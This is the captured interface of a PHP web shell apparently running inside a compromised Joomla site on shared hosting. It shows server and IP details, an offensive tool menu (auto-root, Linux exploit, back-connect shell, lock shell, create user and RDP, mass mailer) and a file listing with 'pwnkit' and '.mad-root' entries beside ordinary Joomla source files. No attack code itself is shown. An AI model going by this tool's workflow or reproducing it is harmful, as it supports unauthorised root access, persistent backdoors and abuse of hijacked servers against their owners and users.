Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
Application /
[ HOME SHELL ]
Name
Size
Permission
Action
CLI
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AdministratorApplication.php
15.84
KB
-rw----r--
ApiApplication.php
11.22
KB
-rw----r--
ApplicationHelper.php
4.53
KB
-rw----r--
BaseApplication.php
1.77
KB
-rw----r--
CMSApplication.php
37.17
KB
-rw----r--
CMSApplicationInterface.php
3.74
KB
-rw----r--
CMSWebApplicationInterface.php
2.62
KB
-rw----r--
CliApplication.php
9.47
KB
-rw----r--
ConsoleApplication.php
10.61
KB
-rw----r--
DaemonApplication.php
24.47
KB
-rw----r--
EventAware.php
2.89
KB
-rw----r--
EventAwareInterface.php
1.66
KB
-rw----r--
ExtensionNamespaceMapper.php
779
B
-rw----r--
IdentityAware.php
1.45
KB
-rw----r--
SiteApplication.php
22.84
KB
-rw----r--
WebApplication.php
12.35
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BaseApplication.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2012 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\Application; \defined('JPATH_PLATFORM') or die; use Joomla\Application\AbstractApplication; use Joomla\CMS\Input\Input; use Joomla\Event\DispatcherAwareInterface; use Joomla\Event\DispatcherAwareTrait; use Joomla\Registry\Registry; /** * Joomla Platform Base Application Class * * @property-read Input $input The application input object * * @since 3.0.0 * @deprecated 5.0 Application classes should be based on \Joomla\Application\AbstractApplication */ abstract class BaseApplication extends AbstractApplication implements DispatcherAwareInterface { use DispatcherAwareTrait, EventAware, IdentityAware; /** * Class constructor. * * @param Input $input An optional argument to provide dependency injection for the application's * input object. If the argument is a \JInput object that object will become * the application's input object, otherwise a default input object is created. * @param Registry $config An optional argument to provide dependency injection for the application's * config object. If the argument is a Registry object that object will become * the application's config object, otherwise a default config object is created. * * @since 3.0.0 */ public function __construct(Input $input = null, Registry $config = null) { $this->input = $input instanceof Input ? $input : new Input; $this->config = $config instanceof Registry ? $config : new Registry; $this->initialise(); } }
Close